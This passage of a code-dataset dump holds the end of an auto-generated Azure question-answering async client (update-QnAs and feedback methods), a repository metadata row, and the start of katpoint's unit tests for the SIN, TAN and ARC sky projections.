"answer": "str", # Optional. Answer text.
"dialog": {
"isContextOnly": bool, # Optional. To mark if a prompt is relevant
only with a previous question or not. If true, do not include this QnA as
answer for queries without context; otherwise, ignores context and includes
this QnA in answers.
"prompts": [
{
"displayOrder": 0, # Optional. Index of the prompt.
It is used for ordering of the prompts.
"displayText": "str", # Optional. Text displayed to
represent a follow up question prompt.
"qna": {
"activeLearningSuggestions": [
{
"clusterHead": "str", #
Optional. Question chosen as the head of suggested
questions cluster by Active Learning clustering
algorithm.
"suggestedQuestions": [
{
"autoSuggestedCount": 0, # Optional. The number
of times the question was suggested automatically
by the Active Learning algorithm.
"question":
"str", # Optional. Question suggested by the
Active Learning feature.
"userSuggestedCount": 0 # Optional. The number
of times the question was suggested explicitly by
the user.
}
]
}
],
"answer": "str", # Optional. Answer text.
"dialog": ...,
"id": 0, # Optional. Unique ID for the QnA.
"metadata": {
"str": "str" # Optional. Metadata
associated with the answer, useful to categorize or filter
question answers.
},
"questions": [
"str" # Optional. List of questions
associated with the answer.
],
"source": "str" # Optional. Source from
which QnA was indexed e.g.
https://docs.microsoft.com/en-us/azure/cognitive-services/QnAMaker/FAQs
.
},
"qnaId": 0 # Optional. ID of the QnA corresponding
to the prompt.
}
]
},
"id": 0, # Optional. Unique ID for the QnA.
"lastUpdatedDateTime": "2020-02-20 00:00:00", # Optional. Date-time when the
QnA was last updated.
"metadata": {
"str": "str" # Optional. Metadata associated with the answer, useful
to categorize or filter question answers.
},
"questions": [
"str" # Optional. List of questions associated with the answer.
],
"source": "str" # Optional. Source from which QnA was indexed e.g.
https://docs.microsoft.com/en-us/azure/cognitive-services/QnAMaker/FAQs .
}
"""
@overload
async def begin_update_qnas(
self, project_name: str, qnas: IO, *, content_type: str = "application/json", **kwargs: Any
) -> AsyncLROPoller[AsyncIterable[JSON]]:
"""Updates the QnAs of a project.
See
https://learn.microsoft.com/rest/api/cognitiveservices/questionanswering/question-answering-projects/update-qnas
for more information.
:param project_name: The name of the project to use. Required.
:type project_name: str
:param qnas: Update QnAs parameters of a project. Required.
:type qnas: IO
:keyword content_type: Body Parameter content-type. Content type parameter for binary body.
Default value is "application/json".
:paramtype content_type: str
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncLROBasePolling. Pass in False
for this operation to not poll, or pass in your own initialized polling object for a personal
polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns an iterator like instance of JSON object
:rtype: ~azure.core.polling.AsyncLROPoller[~azure.core.async_paging.AsyncItemPaged[JSON]]
:raises ~azure.core.exceptions.HttpResponseError:
Example:
.. code-block:: python
# response body for status code(s): 200, 202
response == {
"activeLearningSuggestions": [
{
"clusterHead": "str", # Optional. Question chosen as the
head of suggested questions cluster by Active Learning clustering
algorithm.
"suggestedQuestions": [
{
"autoSuggestedCount": 0, # Optional. The
number of times the question was suggested automatically by the
Active Learning algorithm.
"question": "str", # Optional. Question
suggested by the Active Learning feature.
"userSuggestedCount": 0 # Optional. The
number of times the question was suggested explicitly by the
user.
}
]
}
],
"answer": "str", # Optional. Answer text.
"dialog": {
"isContextOnly": bool, # Optional. To mark if a prompt is relevant
only with a previous question or not. If true, do not include this QnA as
answer for queries without context; otherwise, ignores context and includes
this QnA in answers.
"prompts": [
{
"displayOrder": 0, # Optional. Index of the prompt.
It is used for ordering of the prompts.
"displayText": "str", # Optional. Text displayed to
represent a follow up question prompt.
"qna": {
"activeLearningSuggestions": [
{
"clusterHead": "str", #
Optional. Question chosen as the head of suggested
questions cluster by Active Learning clustering
algorithm.
"suggestedQuestions": [
{
"autoSuggestedCount": 0, # Optional. The number
of times the question was suggested automatically
by the Active Learning algorithm.
"question":
"str", # Optional. Question suggested by the
Active Learning feature.
"userSuggestedCount": 0 # Optional. The number
of times the question was suggested explicitly by
the user.
}
]
}
],
"answer": "str", # Optional. Answer text.
"dialog": ...,
"id": 0, # Optional. Unique ID for the QnA.
"metadata": {
"str": "str" # Optional. Metadata
associated with the answer, useful to categorize or filter
question answers.
},
"questions": [
"str" # Optional. List of questions
associated with the answer.
],
"source": "str" # Optional. Source from
which QnA was indexed e.g.
https://docs.microsoft.com/en-us/azure/cognitive-services/QnAMaker/FAQs
.
},
"qnaId": 0 # Optional. ID of the QnA corresponding
to the prompt.
}
]
},
"id": 0, # Optional. Unique ID for the QnA.
"lastUpdatedDateTime": "2020-02-20 00:00:00", # Optional. Date-time when the
QnA was last updated.
"metadata": {
"str": "str" # Optional. Metadata associated with the answer, useful
to categorize or filter question answers.
},
"questions": [
"str" # Optional. List of questions associated with the answer.
],
"source": "str" # Optional. Source from which QnA was indexed e.g.
https://docs.microsoft.com/en-us/azure/cognitive-services/QnAMaker/FAQs .
}
"""
@distributed_trace_async
async def begin_update_qnas(
self, project_name: str, qnas: Union[List[JSON], IO], **kwargs: Any
) -> AsyncLROPoller[AsyncIterable[JSON]]:
"""Updates the QnAs of a project.
See
https://learn.microsoft.com/rest/api/cognitiveservices/questionanswering/question-answering-projects/update-qnas
for more information.
:param project_name: The name of the project to use. Required.
:type project_name: str
:param qnas: Update QnAs parameters of a project. Is either a list type or a IO type. Required.
:type qnas: list[JSON] or IO
:keyword content_type: Body Parameter content-type. Known values are: 'application/json'.
Default value is None.
:paramtype content_type: str
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncLROBasePolling. Pass in False
for this operation to not poll, or pass in your own initialized polling object for a personal
polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns an iterator like instance of JSON object
:rtype: ~azure.core.polling.AsyncLROPoller[~azure.core.async_paging.AsyncItemPaged[JSON]]
:raises ~azure.core.exceptions.HttpResponseError:
Example:
.. code-block:: python
# response body for status code(s): 200, 202
response == {
"activeLearningSuggestions": [
{
"clusterHead": "str", # Optional. Question chosen as the
head of suggested questions cluster by Active Learning clustering
algorithm.
"suggestedQuestions": [
{
"autoSuggestedCount": 0, # Optional. The
number of times the question was suggested automatically by the
Active Learning algorithm.
"question": "str", # Optional. Question
suggested by the Active Learning feature.
"userSuggestedCount": 0 # Optional. The
number of times the question was suggested explicitly by the
user.
}
]
}
],
"answer": "str", # Optional. Answer text.
"dialog": {
"isContextOnly": bool, # Optional. To mark if a prompt is relevant
only with a previous question or not. If true, do not include this QnA as
answer for queries without context; otherwise, ignores context and includes
this QnA in answers.
"prompts": [
{
"displayOrder": 0, # Optional. Index of the prompt.
It is used for ordering of the prompts.
"displayText": "str", # Optional. Text displayed to
represent a follow up question prompt.
"qna": {
"activeLearningSuggestions": [
{
"clusterHead": "str", #
Optional. Question chosen as the head of suggested
questions cluster by Active Learning clustering
algorithm.
"suggestedQuestions": [
{
"autoSuggestedCount": 0, # Optional. The number
of times the question was suggested automatically
by the Active Learning algorithm.
"question":
"str", # Optional. Question suggested by the
Active Learning feature.
"userSuggestedCount": 0 # Optional. The number
of times the question was suggested explicitly by
the user.
}
]
}
],
"answer": "str", # Optional. Answer text.
"dialog": ...,
"id": 0, # Optional. Unique ID for the QnA.
"metadata": {
"str": "str" # Optional. Metadata
associated with the answer, useful to categorize or filter
question answers.
},
"questions": [
"str" # Optional. List of questions
associated with the answer.
],
"source": "str" # Optional. Source from
which QnA was indexed e.g.
https://docs.microsoft.com/en-us/azure/cognitive-services/QnAMaker/FAQs
.
},
"qnaId": 0 # Optional. ID of the QnA corresponding
to the prompt.
}
]
},
"id": 0, # Optional. Unique ID for the QnA.
"lastUpdatedDateTime": "2020-02-20 00:00:00", # Optional. Date-time when the
QnA was last updated.
"metadata": {
"str": "str" # Optional. Metadata associated with the answer, useful
to categorize or filter question answers.
},
"questions": [
"str" # Optional. List of questions associated with the answer.
],
"source": "str" # Optional. Source from which QnA was indexed e.g.
https://docs.microsoft.com/en-us/azure/cognitive-services/QnAMaker/FAQs .
}
"""
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = kwargs.pop("params", {}) or {}
content_type = kwargs.pop("content_type", _headers.pop("Content-Type", None)) # type: Optional[str]
cls = kwargs.pop("cls", None) # type: ClsType[JSON]
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
content_type = content_type or "application/json"
_json = None
_content = None
if isinstance(qnas, (IO, bytes)):
_content = qnas
else:
_json = qnas
def prepare_request(next_link=None):
if not next_link:
request = build_update_qnas_request(
project_name=project_name,
content_type=content_type,
api_version=self._config.api_version,
json=_json,
content=_content,
headers=_headers,
params=_params,
)
path_format_arguments = {
"Endpoint": self._serialize.url(
"self._config.endpoint", self._config.endpoint, "str", skip_quote=True
),
}
request.url = self._client.format_url(request.url, **path_format_arguments) # type: ignore
else:
# make call to next link with the client's api-version
_parsed_next_link = urlparse(next_link)
_next_request_params = case_insensitive_dict(parse_qs(_parsed_next_link.query))
_next_request_params["api-version"] = self._config.api_version
request = HttpRequest("GET", urljoin(next_link, _parsed_next_link.path), params=_next_request_params)
path_format_arguments = {
"Endpoint": self._serialize.url(
"self._config.endpoint", self._config.endpoint, "str", skip_quote=True
),
}
request.url = self._client.format_url(request.url, **path_format_arguments) # type: ignore
return request
async def extract_data(pipeline_response):
deserialized = pipeline_response.http_response.json()
list_of_elem = deserialized["value"]
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.get("nextLink", None), AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run( # type: ignore # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response)
return pipeline_response
polling = kwargs.pop("polling", True) # type: Union[bool, AsyncPollingMethod]
lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
cont_token = kwargs.pop("continuation_token", None) # type: Optional[str]
if cont_token is None:
raw_result = await self._update_qnas_initial( # type: ignore
project_name=project_name,
qnas=qnas,
content_type=content_type,
cls=lambda x, y, z: x,
headers=_headers,
params=_params,
**kwargs
)
kwargs.pop("error_map", None)
def get_long_running_output(pipeline_response):
async def internal_get_next(next_link=None):
if next_link is None:
return pipeline_response
return await get_next(next_link)
return AsyncItemPaged(internal_get_next, extract_data)
path_format_arguments = {
"Endpoint": self._serialize.url("self._config.endpoint", self._config.endpoint, "str", skip_quote=True),
}
if polling is True:
polling_method = cast(
AsyncPollingMethod,
AsyncLROBasePolling(lro_delay, path_format_arguments=path_format_arguments, **kwargs),
) # type: AsyncPollingMethod
elif polling is False:
polling_method = cast(AsyncPollingMethod, AsyncNoPolling())
else:
polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output,
)
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
@overload
async def add_feedback( # pylint: disable=inconsistent-return-statements
self, project_name: str, feedback: JSON, *, content_type: str = "application/json", **kwargs: Any
) -> None:
"""Update Active Learning feedback.
See
https://learn.microsoft.com/rest/api/cognitiveservices/questionanswering/question-answering-projects/add-feedback
for more information.
:param project_name: The name of the project to use. Required.
:type project_name: str
:param feedback: Feedback for Active Learning. Required.
:type feedback: JSON
:keyword content_type: Body Parameter content-type. Content type parameter for JSON body.
Default value is "application/json".
:paramtype content_type: str
:return: None
:rtype: None
:raises ~azure.core.exceptions.HttpResponseError:
Example:
.. code-block:: python
# JSON input template you can fill out and use as your body input.
feedback = {
"records": [
{
"qnaId": 0, # Optional. Unique ID of the QnA.
"userId": "str", # Optional. Unique identifier of the user.
"userQuestion": "str" # Optional. User suggested question
for the QnA.
}
]
}
"""
@overload
async def add_feedback( # pylint: disable=inconsistent-return-statements
self, project_name: str, feedback: IO, *, content_type: str = "application/json", **kwargs: Any
) -> None:
"""Update Active Learning feedback.
See
https://learn.microsoft.com/rest/api/cognitiveservices/questionanswering/question-answering-projects/add-feedback
for more information.
:param project_name: The name of the project to use. Required.
:type project_name: str
:param feedback: Feedback for Active Learning. Required.
:type feedback: IO
:keyword content_type: Body Parameter content-type. Content type parameter for binary body.
Default value is "application/json".
:paramtype content_type: str
:return: None
:rtype: None
:raises ~azure.core.exceptions.HttpResponseError:
"""
@distributed_trace_async
async def add_feedback( # pylint: disable=inconsistent-return-statements
self, project_name: str, feedback: Union[JSON, IO], **kwargs: Any
) -> None:
"""Update Active Learning feedback.
See
https://learn.microsoft.com/rest/api/cognitiveservices/questionanswering/question-answering-projects/add-feedback
for more information.
:param project_name: The name of the project to use. Required.
:type project_name: str
:param feedback: Feedback for Active Learning. Is either a model type or a IO type. Required.
:type feedback: JSON or IO
:keyword content_type: Body Parameter content-type. Known values are: 'application/json'.
Default value is None.
:paramtype content_type: str
:return: None
:rtype: None
:raises ~azure.core.exceptions.HttpResponseError:
"""
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = kwargs.pop("params", {}) or {}
content_type = kwargs.pop("content_type", _headers.pop("Content-Type", None)) # type: Optional[str]
cls = kwargs.pop("cls", None) # type: ClsType[None]
content_type = content_type or "application/json"
_json = None
_content = None
if isinstance(feedback, (IO, bytes)):
_content = feedback
else:
_json = feedback
request = build_add_feedback_request(
project_name=project_name,
content_type=content_type,
api_version=self._config.api_version,
json=_json,
content=_content,
headers=_headers,
params=_params,
)
path_format_arguments = {
"Endpoint": self._serialize.url("self._config.endpoint", self._config.endpoint, "str", skip_quote=True),
}
request.url = self._client.format_url(request.url, **path_format_arguments) # type: ignore
pipeline_response = await self._client._pipeline.run( # type: ignore # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response)
if cls:
return cls(pipeline_response, None, {})
| [
"[email protected]"
] | |
eb0c32a682abc73083d3f4107b867774b5972b20 | 67e3388ed0e1154dc0ceb189c83a8521eba79fae | /katpoint/test/test_projection.py | 032e6ecdfb607b5818f3fbdd90f050914c002c10 | [
"BSD-3-Clause"
] | permissive | astrojhgu/katpoint | 3dd0f946d76859280ade5f55c85f08538cc24462 | b0fa342c2f6dcebe7474cc405d5fbdb4f3f295bc | refs/heads/master | 2020-12-31T00:40:42.452856 | 2017-01-31T10:30:25 | 2017-01-31T10:30:25 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 32,066 | py | ################################################################################
# Copyright (c) 2009-2016, National Research Foundation (Square Kilometre Array)
#
# Licensed under the BSD 3-Clause License (the "License"); you may not use
# this file except in compliance with the License. You may obtain a copy
# of the License at
#
# https://opensource.org/licenses/BSD-3-Clause
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
################################################################################
"""Tests for the projection module."""
# pylint: disable-msg=C0103,W0212
import unittest
import numpy as np
import katpoint
try:
from .aips_projection import newpos, dircos
found_aips = True
except ImportError:
found_aips = False
def skip(reason=''):
"""Use nose to skip a test."""
try:
import nose
raise nose.SkipTest(reason)
except ImportError:
pass
def assert_angles_almost_equal(x, y, decimal):
primary_angle = lambda x: x - np.round(x / (2.0 * np.pi)) * 2.0 * np.pi
np.testing.assert_almost_equal(primary_angle(x - y), np.zeros(np.shape(x)), decimal=decimal)
class TestProjectionSIN(unittest.TestCase):
"""Test orthographic projection."""
def setUp(self):
self.plane_to_sphere = katpoint.plane_to_sphere['SIN']
self.sphere_to_plane = katpoint.sphere_to_plane['SIN']
N = 100
max_theta = np.pi / 2.0
self.az0 = np.pi * (2.0 * np.random.rand(N) - 1.0)
# Keep away from poles (leave them as corner cases)
self.el0 = 0.999 * np.pi * (np.random.rand(N) - 0.5)
# (x, y) points within unit circle
theta = max_theta * np.random.rand(N)
phi = 2 * np.pi * np.random.rand(N)
self.x = np.sin(theta) * np.cos(phi)
self.y = np.sin(theta) * np.sin(phi)
def test_random_closure(self):
"""SIN projection: do random projections and check closure."""
az, el = self.plane_to_sphere(self.az0, self.el0, self.x, self.y)
xx, yy = self.sphere_to_plane(self.az0, self.el0, az, el)
aa, ee = self.plane_to_sphere(self.az0, self.el0, xx, yy)
np.testing.assert_almost_equal(self.x, xx, decimal=10)
np.testing.assert_almost_equal(self.y, yy, decimal=10)
assert_angles_almost_equal(az, aa, decimal=10)
assert_angles_almost_equal(el, ee, decimal=10)
def test_aips_compatibility(self):
"""SIN projection: compare with original AIPS routine."""
if not found_aips:
skip("AIPS projection module not found")
return
az, el = self.plane_to_sphere(self.az0, self.el0, self.x, self.y)
xx, yy = self.sphere_to_plane(self.az0, self.el0, az, el)
az_aips, el_aips = np.zeros(az.shape), np.zeros(el.shape)
x_aips, y_aips = np.zeros(xx.shape), np.zeros(yy.shape)
for n in xrange(len(az)):
az_aips[n], el_aips[n], ierr = \
newpos(2, self.az0[n], self.el0[n], self.x[n], self.y[n])
x_aips[n], y_aips[n], ierr = \
dircos(2, self.az0[n], self.el0[n], az[n], el[n])
self.assertEqual(ierr, 0)
assert_angles_almost_equal(az, az_aips, decimal=9)
assert_angles_almost_equal(el, el_aips, decimal=9)
np.testing.assert_almost_equal(xx, x_aips, decimal=9)
np.testing.assert_almost_equal(yy, y_aips, decimal=9)
def test_corner_cases(self):
"""SIN projection: test special corner cases."""
# SPHERE TO PLANE
# Origin
xy = np.array(self.sphere_to_plane(0.0, 0.0, 0.0, 0.0))
np.testing.assert_almost_equal(xy, [0.0, 0.0], decimal=12)
# Points 90 degrees from reference point on sphere
xy = np.array(self.sphere_to_plane(0.0, 0.0, np.pi / 2.0, 0.0))
np.testing.assert_almost_equal(xy, [1.0, 0.0], decimal=12)
xy = np.array(self.sphere_to_plane(0.0, 0.0, -np.pi / 2.0, 0.0))
np.testing.assert_almost_equal(xy, [-1.0, 0.0], decimal=12)
xy = np.array(self.sphere_to_plane(0.0, 0.0, 0.0, np.pi / 2.0))
np.testing.assert_almost_equal(xy, [0.0, 1.0], decimal=12)
xy = np.array(self.sphere_to_plane(0.0, 0.0, 0.0, -np.pi / 2.0))
np.testing.assert_almost_equal(xy, [0.0, -1.0], decimal=12)
# Reference point at pole on sphere
xy = np.array(self.sphere_to_plane(0.0, np.pi / 2.0, 0.0, 0.0))
np.testing.assert_almost_equal(xy, [0.0, -1.0], decimal=12)
xy = np.array(self.sphere_to_plane(0.0, np.pi / 2.0, np.pi, 1e-8))
np.testing.assert_almost_equal(xy, [0.0, 1.0], decimal=12)
xy = np.array(self.sphere_to_plane(0.0, np.pi / 2.0, np.pi / 2.0, 0.0))
np.testing.assert_almost_equal(xy, [1.0, 0.0], decimal=12)
xy = np.array(self.sphere_to_plane(0.0, np.pi / 2.0, -np.pi / 2.0, 0.0))
np.testing.assert_almost_equal(xy, [-1.0, 0.0], decimal=12)
# Points outside allowed domain on sphere
self.assertRaises(ValueError, self.sphere_to_plane, 0.0, 0.0, np.pi, 0.0)
self.assertRaises(ValueError, self.sphere_to_plane, 0.0, 0.0, 0.0, np.pi)
# PLANE TO SPHERE
# Origin
ae = np.array(self.plane_to_sphere(0.0, 0.0, 0.0, 0.0))
assert_angles_almost_equal(ae, [0.0, 0.0], decimal=12)
# Points on unit circle in plane
ae = np.array(self.plane_to_sphere(0.0, 0.0, 1.0, 0.0))
assert_angles_almost_equal(ae, [np.pi / 2.0, 0.0], decimal=12)
ae = np.array(self.plane_to_sphere(0.0, 0.0, -1.0, 0.0))
assert_angles_almost_equal(ae, [-np.pi / 2.0, 0.0], decimal=12)
ae = np.array(self.plane_to_sphere(0.0, 0.0, 0.0, 1.0))
assert_angles_almost_equal(ae, [0.0, np.pi / 2.0], decimal=12)
ae = np.array(self.plane_to_sphere(0.0, 0.0, 0.0, -1.0))
assert_angles_almost_equal(ae, [0.0, -np.pi / 2.0], decimal=12)
# Reference point at pole on sphere
ae = np.array(self.plane_to_sphere(0.0, -np.pi / 2.0, 1.0, 0.0))
assert_angles_almost_equal(ae, [np.pi / 2.0, 0.0], decimal=12)
ae = np.array(self.plane_to_sphere(0.0, -np.pi / 2.0, -1.0, 0.0))
assert_angles_almost_equal(ae, [-np.pi / 2.0, 0.0], decimal=12)
ae = np.array(self.plane_to_sphere(0.0, -np.pi / 2.0, 0.0, 1.0))
assert_angles_almost_equal(ae, [0.0, 0.0], decimal=12)
ae = np.array(self.plane_to_sphere(0.0, -np.pi / 2.0, 0.0, -1.0))
assert_angles_almost_equal(ae, [np.pi, 0.0], decimal=12)
# Points outside allowed domain in plane
self.assertRaises(ValueError, self.plane_to_sphere, 0.0, 0.0, 2.0, 0.0)
self.assertRaises(ValueError, self.plane_to_sphere, 0.0, 0.0, 0.0, 2.0)
class TestProjectionTAN(unittest.TestCase):
"""Test gnomonic projection."""
def setUp(self):
self.plane_to_sphere = katpoint.plane_to_sphere['TAN']
self.sphere_to_plane = katpoint.sphere_to_plane['TAN']
N = 100
# Stay away from edge of hemisphere
max_theta = np.pi / 2.0 - 0.01
self.az0 = np.pi * (2.0 * np.random.rand(N) - 1.0)
# Keep away from poles (leave them as corner cases)
self.el0 = 0.999 * np.pi * (np.random.rand(N) - 0.5)
theta = max_theta * np.random.rand(N)
phi = 2 * np.pi * np.random.rand(N)
# Perform inverse TAN mapping to spread out points on plane
self.x = np.tan(theta) * np.cos(phi)
self.y = np.tan(theta) * np.sin(phi)
def test_random_closure(self):
"""TAN projection: do random projections and check closure."""
az, el = self.plane_to_sphere(self.az0, self.el0, self.x, self.y)
xx, yy = self.sphere_to_plane(self.az0, self.el0, az, el)
aa, ee = self.plane_to_sphere(self.az0, self.el0, xx, yy)
np.testing.assert_almost_equal(self.x, xx, decimal=8)
np.testing.assert_almost_equal(self.y, yy, decimal=8)
assert_angles_almost_equal(az, aa, decimal=8)
assert_angles_almost_equal(el, ee, decimal=8)
def test_aips_compatibility(self):
"""TAN projection: compare with original AIPS routine."""
if not found_aips:
skip("AIPS projection module not found")
return
# AIPS TAN only deprojects (x, y) coordinates within unit circle
r = self.x * self.x + self.y * self.y
az0, el0 = self.az0[r <= 1.0], self.el0[r <= 1.0]
x, y = self.x[r <= 1.0], self.y[r <= 1.0]
az, el = self.plane_to_sphere(az0, el0, x, y)
xx, yy = self.sphere_to_plane(az0, el0, az, el)
az_aips, el_aips = np.zeros(az.shape), np.zeros(el.shape)
x_aips, y_aips = np.zeros(xx.shape), np.zeros(yy.shape)
for n in xrange(len(az)):
az_aips[n], el_aips[n], ierr = \
newpos(3, az0[n], el0[n], x[n], y[n])
x_aips[n], y_aips[n], ierr = \
dircos(3, az0[n], el0[n], az[n], el[n])
self.assertEqual(ierr, 0)
assert_angles_almost_equal(az, az_aips, decimal=10)
assert_angles_almost_equal(el, el_aips, decimal=10)
np.testing.assert_almost_equal(xx, x_aips, decimal=10)
np.testing.assert_almost_equal(yy, y_aips, decimal=10)
def test_corner_cases(self):
"""TAN projection: test special corner cases."""
# SPHERE TO PLANE
# Origin
xy = np.array(self.sphere_to_plane(0.0, 0.0, 0.0, 0.0))
np.testing.assert_almost_equal(xy, [0.0, 0.0], decimal=12)
# Points 45 degrees from reference point on sphere
xy = np.array(self.sphere_to_plane(0.0, 0.0, np.pi / 4.0, 0.0))
np.testing.assert_almost_equal(xy, [1.0, 0.0], decimal=12)
xy = np.array(self.sphere_to_plane(0.0, 0.0, -np.pi / 4.0, 0.0))
np.testing.assert_almost_equal(xy, [-1.0, 0.0], decimal=12)
xy = np.array(self.sphere_to_plane(0.0, 0.0, 0.0, np.pi / 4.0))
np.testing.assert_almost_equal(xy, [0.0, 1.0], decimal=12)
xy = np.array(self.sphere_to_plane(0.0, 0.0, 0.0, -np.pi / 4.0))
np.testing.assert_almost_equal(xy, [0.0, -1.0], decimal=12)
# Reference point at pole on sphere
xy = np.array(self.sphere_to_plane(0.0, np.pi / 2.0, 0.0, np.pi / 4.0))
np.testing.assert_almost_equal(xy, [0.0, -1.0], decimal=12)
xy = np.array(self.sphere_to_plane(0.0, np.pi / 2.0, np.pi, np.pi / 4.0))
np.testing.assert_almost_equal(xy, [0.0, 1.0], decimal=12)
xy = np.array(self.sphere_to_plane(0.0, np.pi / 2.0, np.pi / 2.0, np.pi / 4.0))
np.testing.assert_almost_equal(xy, [1.0, 0.0], decimal=12)
xy = np.array(self.sphere_to_plane(0.0, np.pi / 2.0, -np.pi / 2.0, np.pi / 4.0))
np.testing.assert_almost_equal(xy, [-1.0, 0.0], decimal=12)
# Points outside allowed domain on sphere
self.assertRaises(ValueError, self.sphere_to_plane, 0.0, 0.0, np.pi, 0.0)
self.assertRaises(ValueError, self.sphere_to_plane, 0.0, 0.0, 0.0, np.pi)
# PLANE TO SPHERE
# Origin
ae = np.array(self.plane_to_sphere(0.0, 0.0, 0.0, 0.0))
assert_angles_almost_equal(ae, [0.0, 0.0], decimal=12)
# Points on unit circle in plane
ae = np.array(self.plane_to_sphere(0.0, 0.0, 1.0, 0.0))
assert_angles_almost_equal(ae, [np.pi / 4.0, 0.0], decimal=12)
ae = np.array(self.plane_to_sphere(0.0, 0.0, -1.0, 0.0))
assert_angles_almost_equal(ae, [-np.pi / 4.0, 0.0], decimal=12)
ae = np.array(self.plane_to_sphere(0.0, 0.0, 0.0, 1.0))
assert_angles_almost_equal(ae, [0.0, np.pi / 4.0], decimal=12)
ae = np.array(self.plane_to_sphere(0.0, 0.0, 0.0, -1.0))
assert_angles_almost_equal(ae, [0.0, -np.pi / 4.0], decimal=12)
# Reference point at pole on sphere
ae = np.array(self.plane_to_sphere(0.0, -np.pi / 2.0, 1.0, 0.0))
assert_angles_almost_equal(ae, [np.pi / 2.0, -np.pi / 4.0], decimal=12)
ae = np.array(self.plane_to_sphere(0.0, -np.pi / 2.0, -1.0, 0.0))
assert_angles_almost_equal(ae, [-np.pi / 2.0, -np.pi / 4.0], decimal=12)
ae = np.array(self.plane_to_sphere(0.0, -np.pi / 2.0, 0.0, 1.0))
assert_angles_almost_equal(ae, [0.0, -np.pi / 4.0], decimal=12)
ae = np.array(self.plane_to_sphere(0.0, -np.pi / 2.0, 0.0, -1.0))
assert_angles_almost_equal(ae, [np.pi, -np.pi / 4.0], decimal=12)
class TestProjectionARC(unittest.TestCase):
"""Test zenithal equidistant projection."""
def setUp(self):
self.plane_to_sphere = katpoint.plane_to_sphere['ARC']
self.sphere_to_plane = katpoint.sphere_to_plane['ARC']
N = 100
# Stay away from edge of circle
max_theta = np.pi - 0.01
self.az0 = np.pi * (2.0 * np.random.rand(N) - 1.0)
# Keep away from poles (leave them as corner cases)
self.el0 = 0.999 * np.pi * (np.random.rand(N) - 0.5)
# (x, y) points within circle of radius pi
theta = max_theta * np.random.rand(N)
phi = 2 * np.pi * np.random.rand(N)
self.x = theta * np.cos(phi)
self.y = theta * np.sin(phi)
def test_random_closure(self):
"""ARC projection: do random projections and check closure."""
az, el = self.plane_to_sphere(self.az0, self.el0, self.x, self.y)
xx, yy = self.sphere_to_plane(self.az0, self.el0, az, el)
aa, ee = self.plane_to_sphere(self.az0, self.el0, xx, yy)
np.testing.assert_almost_equal(self.x, xx, decimal=8)
np.testing.assert_almost_equal(self.y, yy, decimal=8)
assert_angles_almost_equal(az, aa, decimal=8)
assert_angles_almost_equal(el, ee, decimal=8)
def test_aips_compatibility(self):
"""ARC projection: compare with original AIPS routine."""
if not found_aips:
skip("AIPS projection module not found")
return
az, el = self.plane_to_sphere(self.az0, self.el0, self.x, self.y)
xx, yy = self.sphere_to_plane(self.az0, self.el0, az, el)
az_aips, el_aips = np.zeros(az.shape), np.zeros(el.shape)
x_aips, y_aips = np.zeros(xx.shape), np.zeros(yy.shape)
for n in xrange(len(az)):
az_aips[n], el_aips[n], ierr = \
newpos(4, self.az0[n], self.el0[n], self.x[n], self.y[n])
x_aips[n], y_aips[n], ierr = \
dircos(4, self.az0[n], self.el0[n], az[n], el[n])
self.assertEqual(ierr, 0)
assert_angles_almost_equal(az, az_aips, decimal=8)
assert_angles_almost_equal(el, el_aips, decimal=8)
np.testing.assert_almost_equal(xx, x_aips, decimal=8)
np.testing.assert_almost_equal(yy, y_aips, decimal=8)
def test_corner_cases(self):
"""ARC projection: test special corner cases."""
# SPHERE TO PLANE
# Origin
xy = np.array(self.sphere_to_plane(0.0, 0.0, 0.0, 0.0))
np.testing.assert_almost_equal(xy, [0.0, 0.0], decimal=12)
# Points 90 degrees from reference point on sphere
xy = np.array(self.sphere_to_plane(0.0, 0.0, np.pi / 2.0, 0.0))
np.testing.assert_almost_equal(xy, [np.pi / 2.0, 0.0], decimal=12)
xy = np.array(self.sphere_to_plane(0.0, 0.0, -np.pi / 2.0, 0.0))
np.testing.assert_almost_equal(xy, [-np.pi / 2.0, 0.0], decimal=12)
xy = np.array(self.sphere_to_plane(0.0, 0.0, 0.0, np.pi / 2.0))
np.testing.assert_almost_equal(xy, [0.0, np.pi / 2.0], decimal=12)
xy = np.array(self.sphere_to_plane(0.0, 0.0, 0.0, -np.pi / 2.0))
np.testing.assert_almost_equal(xy, [0.0, -np.pi / 2.0], decimal=12)
# Reference point at pole on sphere
xy = np.array(self.sphere_to_plane(0.0, np.pi / 2.0, 0.0, 0.0))
np.testing.assert_almost_equal(xy, [0.0, -np.pi / 2.0], decimal=12)
